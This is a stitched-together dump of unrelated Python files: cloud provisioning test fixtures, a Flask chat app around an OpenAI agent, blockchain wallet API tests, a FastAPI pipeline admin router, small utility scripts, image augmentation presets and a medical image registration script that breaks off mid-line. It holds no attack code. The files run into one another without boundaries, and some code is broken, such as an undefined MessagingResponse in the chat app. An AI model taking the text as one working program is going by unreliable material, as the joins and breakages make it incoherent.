from unittest.mock import MagicMock, PropertyMock import pytest from mrack.config import ProvisioningConfig from mrack.host import STATUS_ACTIVE, Host """Fixtures for unit tests.""" @pytest.fixture def openstack_config(): return { "strategy": "retry", "max_retry": 5, "images": { "rhel-8.5": "osp-rhel-8-5", "fedora-34": "osp-fedora34", "win-2019": "osp-win-2019", }, "flavors": { "ipaserver": "test.medium", "ipaclient": "test.micro", "ad": "test.medium", "default": "test.nano", }, "networks": { "IPv4": [ "test-net4-1", "test-net4-2", "test-net4-3", "test-net4-4", ], "IPv6": [ "test-net6-1", ], "dual": [ "test-dual-1", "test-dual-2", ], }, "default_network": "IPv4", "keypair": "mrack-keypair", } @pytest.fixture def aws_config(): return { "images": { "rhel-8.5": "ami-rhel-8-5", "fedora-34": "ami-fedora34", "win-2019": "ami-win-2019", }, "flavors": { "ipaserver": "t2.medium", "ipaclient": "t2.micro", "ad": "t2.medium", "default": "t2.nano", }, "users": { "rhel-8.5": "ec2-user", }, "keypair": "mrack-keypair.pem", "security_group": "sg-something", "credentials_file": "aws.key", "profile": "default", "spot": True, "instance_tags": { "Name": "mrack-runner", "mrack": "True", "Persistent": "False", }, } @pytest.fixture def provisioning_config(openstack_config, aws_config): raw = { "openstack": openstack_config, "aws": aws_config, "users": { "rhel-8.5": "cloud-user", "fedora-34": "fedora", "win-2019": "Administrator", }, } return ProvisioningConfig(raw) @pytest.fixture def metahost1(): return { "name": "ipa1.example.com", "role": "first", "group": "ipaserver", "os": "rhel-8.5", } @pytest.fixture def metahost_win(): return { "name": "ipa1.example.com", "role": "ad", "group": "ad_root", "os": "win-2019", "network": "IPv4", } def mock_provider(name): mock = MagicMock() name_prop = PropertyMock(return_value=name) type(mock).name = name_prop return mock def meta_to_host(meta_host, provider_key, host_id, ip_address): return Host( mock_provider(provider_key), host_id, meta_host["name"], meta_host["os"], meta_host["group"], ip_address, STATUS_ACTIVE, {}, ) @pytest.fixture def host1_aws(metahost1): return meta_to_host(metahost1, "aws", "1", "192.168.0.128") @pytest.fixture def host1_osp(metahost1): return meta_to_host(metahost1, "openstack", "2", "192.168.1.128") @pytest.fixture def host_win_aws(metahost_win): return meta_to_host(metahost_win, "aws", "3", "192.168.0.129") app/webapp/webchat.py import requests, os import html import logging from flask import Flask, request, render_template, url_for, jsonify from pandas import to_datetime, to_timedelta from ..openai_agent.agent import OpenAIAgent from ..openai_agent.agent_utils import process_message_and_get_reply from dotenv import find_dotenv, load_dotenv from ast import literal_eval logging.basicConfig() logger = logging.getLogger("APP") logger.setLevel(logging.DEBUG) load_dotenv(find_dotenv()) app = Flask(__name__) chat_agent = OpenAIAgent(engine='davinci-codex',agent_name=os.environ.get("AGENT_NAME"),chatter_name=os.environ.get("CHATTER_NAME","HUMAN")) # @app.route("/") def index(): print(os.getcwd()) return render_template("docs.html") # @app.route('/bot', methods=['POST']) def bot(): incoming_msg = request.values.get('Body', '') resp = MessagingResponse() msg = resp.message() reply = process_message_and_get_reply(chat_agent,incoming_msg,120) msg.body(reply) return str(resp) # @app.route('/chat/') def chat(msg): if not chat_agent.is_conversation_active: chat_agent.start_conversation() logger.info("Previous conversation history: "+chat_agent.conversation) 
reply = process_message_and_get_reply(chat_agent,msg,120) conversation = chat_agent.conversation #chat_agent.make_chat_prompt(msg,False) conversation = conversation#+reply conversation_html = conversation.replace(chat_agent.START_TEMPLATE,""+chat_agent.START_TEMPLATE+"").replace("\n","
    ") logger.debug("New conversation history in html: "+conversation_html) return render_template("chat_template.html",conversation=conversation_html) # @app.route('/conversation') def show_conversation(): conversation = chat_agent.conversation conversation_html = conversation.replace(chat_agent.START_TEMPLATE,""+chat_agent.START_TEMPLATE+"").replace("\n","
    ") return render_template("chat_template.html",conversation=conversation_html) @app.route('/api/chat', methods=['POST']) def api_chat(): """ Function that receives a text message in the reponse of a POST request """ if not chat_agent.is_conversation_active: chat_agent.start_conversation() data = request.get_json() logger.debug(str(data)) if data is not None: if 'message' not in data: return jsonify({'error': 'missing required "message" field'}), 400 msg = data.pop('message') if 'engine' in data: agent = OpenAIAgent(engine=data.pop('engine'),agent_name=os.environ.get("AGENT_NAME"),chatter_name=os.environ.get("CHATTER_NAME","HUMAN")) else: agent = chat_agent.copy() if 'chatter_name' in data: chat_agent.set_chatter_name(data.pop('chatter_name')) if 'agent_name' in data: chat_agent.set_agent_name(data.pop('agent_name')) data['max_tokens'] = data.pop("length",data.get('max_tokens',120)) if data: agent.set_agent_params(**data) reply = process_message_and_get_reply(agent,msg) else: reply = 'I do not understand you!' return jsonify({'reply': reply}) json_resp = { 'agent_name':agent.agent_name, 'engine':agent.engine, 'message':msg, 'reply': reply, 'time': to_datetime("now").isoformat(), } return jsonify(json_resp) @app.route('/api/completion', methods=['POST']) def api_completion(): data = request.get_json() logger.debug(str(data)) if data: if 'message' not in data and 'prompt' not in data: return jsonify({'error': 'missing required "prompt" field'}), 400 if 'prompt' in data: prompt = data.pop('prompt') if 'message' in data: prompt = data.pop('message') if 'engine' in data: agent = OpenAIAgent(engine=data.pop('engine'),agent_name=os.environ.get("AGENT_NAME"),chatter_name=os.environ.get("CHATTER_NAME","HUMAN")) else: agent = chat_agent.copy() data['max_tokens'] = data.pop("length",data.get('max_tokens',120)) if data: agent.set_agent_params(**data) completion = agent.get_completion(prompt) else: return jsonify({'error': 'missing json payload'}), 400 json_resp = { 'engine':agent.engine, 'completion': prompt+completion.choices[0].text, 'time': to_datetime("now").isoformat(), } return jsonify(json_resp) if __name__ == '__main__': app.run(debug=False, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)))BoostryJP/ibet-Wallet-API """ Copyright BOOSTRY Co., Ltd. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
SPDX-License-Identifier: Apache-2.0 """ from unittest import mock from web3 import Web3 from app import config from app.model.db import Node web3 = Web3(Web3.HTTPProvider(config.WEB3_HTTP_PROVIDER)) class TestNodeInfoBlockSyncStatus: # target api apiurl = "/v2/NodeInfo/BlockSyncStatus" @staticmethod def insert_node_data(session, is_synced, endpoint_uri=config.WEB3_HTTP_PROVIDER, priority=0): node = Node() node.is_synced = is_synced node.endpoint_uri = endpoint_uri node.priority = priority session.add(node) session.commit() ################################################## # Normal ################################################## # Normal_1 # Node is synced def test_normal_1(self, client, session): with mock.patch("app.utils.web3_utils.FailOverHTTPProvider.is_default", False): # prepare test data self.insert_node_data(session, is_synced=False, endpoint_uri="http://localhost:8546") self.insert_node_data(session, is_synced=True, endpoint_uri=config.WEB3_HTTP_PROVIDER, priority=1) # request target api resp = client.simulate_get(self.apiurl) # assertion latest_block_number = web3.eth.blockNumber assert resp.status_code == 200 assert resp.json["meta"] == { "code": 200, "message": "OK" } assert resp.json["data"] == { "is_synced": True, "latest_block_number": latest_block_number } # Normal_2 # Node is not synced def test_normal_2(self, client, session): with mock.patch("app.utils.web3_utils.FailOverHTTPProvider.is_default", False): # prepare test data self.insert_node_data(session, is_synced=False) self.insert_node_data(session, is_synced=False, endpoint_uri="http://localhost:8546", priority=1) # request target api resp = client.simulate_get(self.apiurl) # assertion assert resp.status_code == 200 assert resp.json["meta"] == { "code": 200, "message": "OK" } assert resp.json["data"] == { "is_synced": False, "latest_block_number": None } from datetime import datetime from typing import Callable, List, Optional from fastapi import APIRouter, Depends from pydantic import BaseModel from starlette.responses import Response from watchmen_auth import PrincipalService from watchmen_data_kernel.cache import CacheService from watchmen_data_kernel.common import ask_all_date_formats from watchmen_meta.admin import PipelineService from watchmen_meta.analysis import PipelineIndexService from watchmen_meta.common import ask_meta_storage, ask_snowflake_generator, TupleService from watchmen_model.admin import Pipeline, PipelineAction, PipelineStage, PipelineUnit, UserRole from watchmen_model.common import PipelineId, TenantId, TopicId from watchmen_rest import get_admin_principal, get_super_admin_principal from watchmen_rest.util import raise_400, raise_403, raise_404, validate_tenant_id from watchmen_rest_doll.doll import ask_tuple_delete_enabled from watchmen_rest_doll.util import trans, trans_readonly from watchmen_utilities import ArrayHelper, is_blank, is_date router = APIRouter() def get_pipeline_service(principal_service: PrincipalService) -> PipelineService: return PipelineService(ask_meta_storage(), ask_snowflake_generator(), principal_service) def get_pipeline_index_service(pipeline_service: PipelineService) -> PipelineIndexService: return PipelineIndexService(pipeline_service.storage, pipeline_service.snowflakeGenerator) @router.get('/pipeline', tags=[UserRole.ADMIN], response_model=Pipeline) async def load_pipeline_by_id( pipeline_id: Optional[PipelineId], principal_service: PrincipalService = Depends(get_admin_principal) ) -> Pipeline: if is_blank(pipeline_id): raise_400('Pipeline id is required.') 
pipeline_service = get_pipeline_service(principal_service) def action() -> Pipeline: # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.find_by_id(pipeline_id) if pipeline is None: raise_404() # tenant id must match current principal's if pipeline.tenantId != principal_service.get_tenant_id(): raise_404() return pipeline return trans_readonly(pipeline_service, action) def redress_action_ids(action: PipelineAction, pipeline_service: PipelineService) -> None: if TupleService.is_storable_id_faked(action.actionId): action.actionId = pipeline_service.generate_storable_id() def redress_unit_ids(unit: PipelineUnit, pipeline_service: PipelineService) -> None: if TupleService.is_storable_id_faked(unit.unitId): unit.unitId = pipeline_service.generate_storable_id() ArrayHelper(unit.do).each(lambda x: redress_action_ids(x, pipeline_service)) def redress_stage_ids(stage: PipelineStage, pipeline_service: PipelineService) -> None: if TupleService.is_storable_id_faked(stage.stageId): stage.stageId = pipeline_service.generate_storable_id() ArrayHelper(stage.units).each(lambda x: redress_unit_ids(x, pipeline_service)) def redress_ids(pipeline: Pipeline, pipeline_service: PipelineService) -> None: ArrayHelper(pipeline.stages).each(lambda x: redress_stage_ids(x, pipeline_service)) def build_pipeline_index(pipeline: Pipeline, pipeline_service: PipelineService) -> None: get_pipeline_index_service(pipeline_service).build_index(pipeline) def build_pipeline_cache(pipeline: Pipeline) -> None: CacheService.pipeline().put(pipeline) def post_save_pipeline(pipeline: Pipeline, pipeline_service: PipelineService) -> None: build_pipeline_index(pipeline, pipeline_service) build_pipeline_cache(pipeline) # noinspection PyUnusedLocal def ask_save_pipeline_action( pipeline_service: PipelineService, principal_service: PrincipalService) -> Callable[[Pipeline], Pipeline]: def action(pipeline: Pipeline) -> Pipeline: if pipeline_service.is_storable_id_faked(pipeline.pipelineId): pipeline_service.redress_storable_id(pipeline) redress_ids(pipeline, pipeline_service) # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.create(pipeline) else: # noinspection PyTypeChecker existing_pipeline: Optional[Pipeline] = pipeline_service.find_by_id(pipeline.pipelineId) if existing_pipeline is not None: if existing_pipeline.tenantId != pipeline.tenantId: raise_403() redress_ids(pipeline, pipeline_service) # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.update(pipeline) post_save_pipeline(pipeline, pipeline_service) return pipeline return action @router.post('/pipeline', tags=[UserRole.ADMIN], response_model=Pipeline) async def save_pipeline( pipeline: Pipeline, principal_service: PrincipalService = Depends(get_admin_principal) ) -> Pipeline: validate_tenant_id(pipeline, principal_service) pipeline_service = get_pipeline_service(principal_service) action = ask_save_pipeline_action(pipeline_service, principal_service) return trans(pipeline_service, lambda: action(pipeline)) def post_update_pipeline_name(pipeline: Pipeline, pipeline_service: PipelineService) -> None: get_pipeline_index_service(pipeline_service).update_index_on_name_changed(pipeline) CacheService.pipeline().put(pipeline) @router.get('/pipeline/rename', tags=[UserRole.ADMIN], response_class=Response) async def update_pipeline_name_by_id( pipeline_id: Optional[PipelineId], name: Optional[str], principal_service: PrincipalService = Depends(get_admin_principal) ) -> None: """ rename pipeline will not increase the optimistic lock version """ 
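# A rough client-side sketch of calling the rename endpoint documented above; the host,
# port and bearer token are assumptions for illustration and are not defined by this module:
#
#     import requests
#     resp = requests.get(
#         "http://localhost:8000/pipeline/rename",
#         params={"pipeline_id": "p-1", "name": "renamed pipeline"},
#         headers={"Authorization": "Bearer <admin-token>"},
#     )
#     resp.raise_for_status()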
if is_blank(pipeline_id): raise_400('Pipeline id is required.') pipeline_service = get_pipeline_service(principal_service) def action() -> None: existing_tenant_id: Optional[TenantId] = pipeline_service.find_tenant_id(pipeline_id) if existing_tenant_id is None: raise_404() elif existing_tenant_id != principal_service.get_tenant_id(): raise_403() # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.update_name(pipeline_id, name, principal_service.get_tenant_id()) post_update_pipeline_name(pipeline, pipeline_service) trans(pipeline_service, action) def post_update_pipeline_enablement(pipeline: Pipeline, pipeline_service: PipelineService) -> None: get_pipeline_index_service(pipeline_service).update_index_on_enablement_changed(pipeline) CacheService.pipeline().put(pipeline) @router.get('/pipeline/enabled', tags=[UserRole.ADMIN], response_class=Response) async def update_pipeline_enabled_by_id( pipeline_id: Optional[PipelineId], enabled: Optional[bool], principal_service: PrincipalService = Depends(get_admin_principal) ) -> None: """ enable/disable pipeline will not increase the optimistic lock version """ if is_blank(pipeline_id): raise_400('Pipeline id is required.') if enabled is None: raise_400('Enabled is required.') pipeline_service = get_pipeline_service(principal_service) def action() -> None: existing_tenant_id: Optional[TenantId] = pipeline_service.find_tenant_id(pipeline_id) if existing_tenant_id is None: raise_404() elif existing_tenant_id != principal_service.get_tenant_id(): raise_403() # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.update_enablement(pipeline_id, enabled, principal_service.get_tenant_id()) post_update_pipeline_enablement(pipeline, pipeline_service) trans(pipeline_service, action) @router.get('/pipeline/all', tags=[UserRole.ADMIN], response_model=List[Pipeline]) async def find_all_pipelines(principal_service: PrincipalService = Depends(get_admin_principal)) -> List[Pipeline]: pipeline_service = get_pipeline_service(principal_service) def action() -> List[Pipeline]: tenant_id = principal_service.get_tenant_id() return pipeline_service.find_all(tenant_id) return trans_readonly(pipeline_service, action) class LastModified(BaseModel): at: str = None # noinspection DuplicatedCode @router.post('/pipeline/updated', tags=[UserRole.ADMIN], response_model=List[Pipeline]) async def find_updated_pipelines( lastModified: LastModified, principal_service: PrincipalService = Depends(get_admin_principal) ) -> List[Pipeline]: if lastModified is None or is_blank(lastModified.at): return [] parsed, last_modified_at = is_date(lastModified.at, ask_all_date_formats()) if not parsed: return [] if not isinstance(last_modified_at, datetime): last_modified_at = datetime( year=last_modified_at.year, month=last_modified_at.month, day=last_modified_at.day, hour=0, minute=0, second=0, microsecond=0, tzinfo=None) pipeline_service = get_pipeline_service(principal_service) def action() -> List[Pipeline]: return pipeline_service.find_modified_after(last_modified_at, principal_service.get_tenant_id()) return trans_readonly(pipeline_service, action) def remove_pipeline_index(pipeline_id: PipelineId, pipeline_service: PipelineService) -> None: get_pipeline_index_service(pipeline_service).remove_index(pipeline_id) def post_delete_pipeline(pipeline_id: PipelineId, pipeline_service: PipelineService) -> None: remove_pipeline_index(pipeline_id, pipeline_service) CacheService.pipeline().remove(pipeline_id) @router.delete('/pipeline', tags=[UserRole.SUPER_ADMIN], 
response_model=Pipeline) async def delete_pipeline_by_id_by_super_admin( pipeline_id: Optional[PipelineId] = None, principal_service: PrincipalService = Depends(get_super_admin_principal) ) -> Pipeline: if not ask_tuple_delete_enabled(): raise_404('Not Found') if is_blank(pipeline_id): raise_400('Topic id is required.') pipeline_service = get_pipeline_service(principal_service) def action() -> Pipeline: # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.delete(pipeline_id) if pipeline is None: raise_404() post_delete_pipeline(pipeline.pipelineId, pipeline_service) return pipeline return trans(pipeline_service, action) #!/usr/bin/env python3 import os import sys import shutil # Recursive rename file in folder (argument) to snake case directory = sys.argv[1] replace = [["(", "["], [")", "]"], ["{", "["], ["}", "]"], ["_", ""], ["---", "-"], ["--", "-"], ["+", ""]] def exclude_words(name): for item in replace: name = name.replace(item[0], item[1]) return name for root, dirs, files in os.walk(directory): for f in files: split = f.find(".") name = f.lower() name = exclude_words(name) name = name.replace(" ", "-") shutil.move(root+"/"+f, root+"/"+name) for root, dirs, files in os.walk(directory): for dr in dirs: name = dr.lower() name = exclude_words(name) shutil.move(root+"/"+dr, root+"/"+name) from torchvision import transforms import random def supervised_augmentations(): """ Return best augmentations for the Supervised algorithm. Returns: -------- train_transform: Torchvision transforms Augmentations for the training set. test_transform: Torchvision transforms Augmentations for the test set. """ train_transform = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) test_transform = transforms.Compose([transforms.Resize(150), ]) return train_transform, test_transform def adda_augmentations(): """ Return best augmentations for the ADDA algorithm. Returns: -------- train_transform_source: Torchvision transforms Augmentations for the source training set. train_transform_target: Torchvision transforms Augmentations for the target training set. test_transform: Torchvision transforms Augmentations for the test set. """ train_transform_source = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) train_transform_target = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) test_transform = transforms.Compose([transforms.Resize(150), ]) return train_transform_source, train_transform_target, test_transform def adamatch_augmentations(): """ Return best augmentations for the AdaMatch algorithm. Returns: -------- train_transform_source_weak: Torchvision transforms Weak augmentations for the source training set. train_transform_source_strong: Torchvision transforms Strong augmentations for the source training set. train_transform_target_weak: Torchvision transforms Weak augmentations for the target training set. train_transform_target_strong: Torchvision transforms Strong augmentations for the target training set. test_transform: Torchvision transforms Augmentations for the test set. 
""" train_transform_source_weak = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) train_transform_target_weak = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) train_transform_source_strong = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.RandomAutocontrast(), transforms.GaussianBlur(kernel_size=(5, 9), sigma=(0.1, 1.)), #transforms.RandomEqualize(), # only on PIL images transforms.RandomInvert(), #transforms.RandomPosterize(random.randint(1, 8)), # only on PIL images transforms.RandomAdjustSharpness(random.uniform(0, 1)), transforms.RandomSolarize(random.uniform(0, 1)), transforms.RandomAffine(45, translate=(0.3, 0.3), scale=(0.8, 1.2), shear=(-0.3, 0.3, -0.3, 0.3)), #transforms.RandomErasing() ]) train_transform_target_strong = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.RandomAutocontrast(), transforms.GaussianBlur(kernel_size=(5, 9), sigma=(0.1, 1.)), #transforms.RandomEqualize(), # only on PIL images transforms.RandomInvert(), #transforms.RandomPosterize(random.randint(1, 8)), # only on PIL images transforms.RandomAdjustSharpness(random.uniform(0, 1)), transforms.RandomSolarize(random.uniform(0, 1)), transforms.RandomAffine(45, translate=(0.3, 0.3), scale=(0.8, 1.2), shear=(-0.3, 0.3, -0.3, 0.3)), #transforms.RandomErasing() ]) test_transform = transforms.Compose([transforms.Resize(150), ]) return train_transform_source_weak, train_transform_target_weak, train_transform_source_strong, train_transform_target_strong, test_transform def self_ensemble_augmentations(): """ Return best augmentations for the Self-Ensemble algorithm. Returns: -------- train_transform_source: Torchvision transforms Augmentations for the source training set. train_transform_target: Torchvision transforms Augmentations for the target training set. test_transform: Torchvision transforms Augmentations for the test set. 
""" train_transform_source = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.GaussianBlur(kernel_size=(5, 9), sigma=(0.1, 1.)), ]) train_transform_target = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) test_transform = transforms.Compose([transforms.Resize(150), ]) return train_transform_source, train_transform_target, test_transform# example 2 of pyusl # Fit the USL curve based on four measurements # Then plot the predicted curve from 1 to 20 from pyusl import usl; import numpy as np; u = usl(1, 2, 0) x = [1,2,3,4] y = [1,2.1,2.9,3.5] u.fit(x, y, requires_plot = False) xgrid = np.linspace(1,20,200) u.plot(xgrid) #!/usr/bin/env python3 import json import netaddr import sys import urllib.request import yaml GOOG_URL = "https://www.gstatic.com/ipranges/goog.json" CLOUD_URL = "https://www.gstatic.com/ipranges/cloud.json" def read_url(url): try: s = urllib.request.urlopen(url).read() return json.loads(s) except urllib.error.HTTPError: print("Invalid HTTP response from %s" % url) return {} except json.decoder.JSONDecodeError: print("Could not parse HTTP response from %s" % url) return {} def main(custom_labels): goog_json = read_url(GOOG_URL) cloud_json = read_url(CLOUD_URL) if goog_json and cloud_json: print("# Please use update-ip-range-labels.sh to update this file.") print("# {} published: {}".format(GOOG_URL, goog_json.get('creationTime'))) print("# {} published: {}".format(CLOUD_URL, cloud_json.get('creationTime'))) goog_ipv4_cidrs = netaddr.IPSet() goog_ipv6_cidrs = netaddr.IPSet() for e in goog_json['prefixes']: if e.get('ipv4Prefix'): goog_ipv4_cidrs.add(e.get('ipv4Prefix')) if e.get('ipv6Prefix'): goog_ipv6_cidrs.add(e.get('ipv6Prefix')) cloud_ipv4_cidrs = netaddr.IPSet() cloud_ipv6_cidrs = netaddr.IPSet() for e in cloud_json['prefixes']: if e.get('ipv4Prefix'): cloud_ipv4_cidrs.add(e.get('ipv4Prefix')) if e.get('ipv6Prefix'): cloud_ipv6_cidrs.add(e.get('ipv6Prefix')) print("ipv4_range_labels:") ipv4_cidr_labels = custom_labels.get('ipv4_range_labels', {}) if isinstance(ipv4_cidr_labels, dict): for ip, label in ipv4_cidr_labels.items(): i = netaddr.IPNetwork(ip) print(' - ["{}", "{}", "{}"]'.format(label, i[0], i[-1])) for i in goog_ipv4_cidrs.difference(cloud_ipv4_cidrs).iter_cidrs(): print(' - ["Google IPv4 CIDR", "{}", "{}"]'.format(i[0], i[-1])) print("ipv6_range_labels:") ipv6_cidr_labels = custom_labels.get('ipv6_range_labels', {}) if isinstance(ipv6_cidr_labels, dict): for ip, label in ipv6_cidr_labels.items(): i = netaddr.IPNetwork(ip) print(' - ["{}", "{}", "{}"]'.format(label, i[0], i[-1])) for i in goog_ipv6_cidrs.difference(cloud_ipv6_cidrs).iter_cidrs(): print(' - ["Google IPv4 CIDR", "{}", "{}"]'.format(i[0], i[-1])) if __name__ == '__main__': if 2 != len(sys.argv): print( 'Expecting a single parameter which is the custom labels yaml' ' file path.', file=sys.stderr) sys.exit(1) try: with open(sys.argv[1], 'r') as stream: custom_labels = yaml.safe_load(stream) except Exception: print('Unable to read the custom labels file {}.'.format(sys.argv[1]), file=sys.stderr) sys.exit(1) main(custom_labels) import model.regnet, model.loss, model.util, utils.structure import torch, os import SimpleITK as sitk import matplotlib.pyplot as plt; plot_dpi = 300 import numpy as np import logging, tqdm logging.basicConfig(level=logging.INFO, format = '%(levelname)s: %(message)s') from scipy import interpolate device = torch.device('cuda' if 
torch.cuda.is_available() else 'cpu') case = 1 crop_range = [slice(0, 83), slice(43, 200), slice(10, 250)] pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) # case = 2 # crop_range = [slice(5, 98), slice(30, 195), slice(8, 243)] # pixel_spacing = np.array([1.16, 1.16, 2.5], dtype = np.float32) # case = 3 # crop_range = [slice(0, 95), slice(42, 209), slice(10, 248)] # pixel_spacing = np.array([1.15, 1.15, 2.5], dtype = np.float32) # case = 4 # crop_range = [slice(0, 90), slice(45, 209), slice(11, 242)] # pixel_spacing = np.array([1.13, 1.13, 2.5], dtype = np.float32) # case = 5 # crop_range = [slice(0, 90), slice(60, 222), slice(16, 237)] # pixel_spacing = np.array([1.10, 1.10, 2.5], dtype = np.float32) # case = 6 # crop_range = [slice(10, 107), slice(144, 328), slice(132, 426)] # pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) # case = 7 # crop_range = [slice(13, 108), slice(141, 331), slice(114, 423)] # pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) # case = 8 # crop_range = [slice(18, 118), slice(84, 299), slice(113, 390)] # pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) # case = 9 # crop_range = [slice(0, 70), slice(126, 334), slice(128, 390)] # pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) # case = 10 # crop_range = [slice(0, 90), slice(119, 333), slice(140, 382)] # pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) data_folder = f'/data/dirlab/Case{case}Pack/Image_MHD/' landmark_file = f'/data/dirlab/Case1Pack/ExtremePhases/case{case}_00_50.pt' states_folder = '/result/general_reg/dirlab/' config = dict( dim = 3, # dimension of the input image intensity_scale_const = 1000., # (image - intensity_shift_const)/intensity_scale_const intensity_shift_const = 1000., # scale = 0.7, scale = 0.5, initial_channels = 32, depth = 4, max_num_iteration = 3000, normalization = True, # whether use normalization layer learning_rate = 1e-2, smooth_reg = 1e-3, cyclic_reg = 1e-2, ncc_window_size = 5, load = False, load_optimizer = False, group_index_list = None, pair_disp_indexes = [0, 5], pair_disp_calc_interval = 20, stop_std = 0.0007, stop_query_len = 100, ) config = utils.structure.Struct(**config) landmark_info = torch.load(landmark_file) landmark_disp = landmark_info['disp_00_50'] # w, h, d landmark_00 = landmark_info['landmark_00'] landmark_50 = landmark_info['landmark_50'] crop_min = np.min(np.concatenate((landmark_00, landmark_50), axis = 0), axis = 0) - 8 crop_max = np.max(np.concatenate((landmark_00, landmark_50), axis = 0), axis = 0) + 8 print(crop_min) print(crop_max) image_file_list = sorted([file_name for file_name in os.listdir(data_folder) if file_name.lower().endswith('mhd')]) image_list = [sitk.GetArrayFromImage(sitk.ReadImage(os.path.join(data_folder, file_name))) for file_name in image_file_list] input_image = torch.stack([torch.from_numpy(image)[None] for image in image_list], 0) if config.group_index_list is not None: input_image = input_image[config.group_index_list] input_image = (input_image - config.intensity_shift_const)/config.intensity_scale_const input_image = input_image[:, :, crop_range[0], crop_range[1], crop_range[2]] image_shape = np.array(input_image.shape[2:]) # (d, h, w) num_image = input_image.shape[0] # number of image in the group regnet = model.regnet.RegNet_single(dim = config.dim, n = num_image, scale = config.scale, depth = config.depth, initial_channels = config.initial_channels, normalization = config.normalization) ncc_loss = model.loss.NCC(config.dim, 
config.ncc_window_size) regnet = regnet.to(device) input_image = input_image.to(device) ncc_loss = ncc_loss.to(device) optimizer = torch.optim.Adam(regnet.parameters(), lr = config.learning_rate) calcdisp = model.util.CalcDisp(dim = config.dim, calc_device = 'cuda') if config.load: state_file = os.path.join(states_folder, config.load) if os.path.exists(state_file): state_file = os.path.join(states_folder, config.load) states = torch.load(state_file, map_location = device) regnet.load_state_dict(states['model']) if config.load_optimizer: optimizer.load_state_dict(states['optimizer']) logging.info(f'load model and optimizer state {config.load}.pth') else: logging.info(f'load model state {config.load}.pth') grid_tuple = [np.arange(grid_length, dtype = np.float32) for grid_length in image_shape] landmark_00_converted = np.flip(landmark_00, axis = 1) - np.array([crop_range[0].start, crop_range[1].start, crop_range[2].start], dtype = np.float32) diff_stats = [] stop_criterion = model.util.StopCriterion(stop_std = config.stop_std, query_len = config.stop_query_len) pbar = tqdm.tqdm(range(config.max_num_iteration)) for i in pbar: optimizer.zero_grad() res = regnet(input_image) total_loss = 0. if 'disp_i2t' in res: simi_loss = (ncc_loss(res['warped_input_image'], res['template']) + ncc_loss(input_image, res['warped_template']))/2. else: simi_loss = ncc_loss(res['warped_input_image'], res['template']) total_loss += simi_loss if config.smooth_reg > 0: if 'disp_i2t' in res: smooth_loss = (model.loss.smooth_loss(res['scaled_disp_t2i']) + model.loss.smooth_loss(res['scaled_disp_i2t']))/2. else: # smooth_loss = model.loss.smooth_loss(res['scaled_disp_t2i']) smooth_loss = model.loss.smooth_loss(res['scaled_disp_t2i'], res['scaled_template']) total_loss += config.smooth_reg*smooth_loss smooth_loss_item = smooth_loss.item() else: smooth_loss_item = 0 if config.cyclic_reg > 0: if 'disp_i2t' in res: # cyclic_loss = (torch.mean((torch.sum(res['scaled_disp_t2i'], 0))**2) + torch.mean((torch.sum(res['scaled_disp_i2t'], 0)))**0.5)/2. cyclic_loss = ((torch.mean((torch.sum(res['scaled_disp_t2i'], 0))**2))**0.5 + (torch.mean((torch.sum(res['scaled_disp_i2t'], 0))**2))**0.5)/2. else: cyclic_loss = (torch.mean((torch.sum(res['scaled_disp_t2i'], 0))**2))**0.5 total_loss += config.cyclic_reg*cyclic_loss cyclic_loss_item = cyclic_loss.item() else: cyclic_loss_item = 0 total_loss.backward() optimizer.step() stop_criterion.add(simi_loss.item()) if stop_criterion.stop(): break pbar.set_description(f'{i}, simi. 
loss {simi_loss.item():.4f}, smooth loss {smooth_loss_item:.3f}, cyclic loss {cyclic_loss_item:.3f}') if i % config.pair_disp_calc_interval == 0: if 'disp_i2t' in res: disp_i2t = res['disp_i2t'][config.pair_disp_indexes] else: disp_i2t = calcdisp.inverse_disp(res['disp_t2i'][config.pair_disp_indexes]) composed_disp = calcdisp.compose_disp(disp_i2t, res['disp_t2i'][config.pair_disp_indexes], mode = 'all') composed_disp_np = composed_disp.cpu().numpy() # (2, 2, 3, d, h, w) inter = interpolate.RegularGridInterpolator(grid_tuple, np.moveaxis(composed_disp_np[0, 1], 0, -1)) calc_landmark_disp = inter(landmark_00_converted) diff = (np.sum(((calc_landmark_disp - landmark_disp)*pixel_spacing)**2, 1))**0.5 diff_stats.append([i, np.mean(diff), np.std(diff)]) print(f'\ndiff: {np.mean(diff):.2f}+-{np.std(diff):.2f}({np.max(diff):.2f})') if 'disp_i2t' in res: disp_i2t = res['disp_i2t'][config.pair_disp_indexes] else: disp_i2t = calcdisp.inverse_disp(res['disp_t2i'][config.pair_disp_indexes]) composed_disp = calcdisp.compose_disp(disp_i2t, res['disp_t2i'][config.pair_disp_indexes], mode = 'all') composed_disp_np = 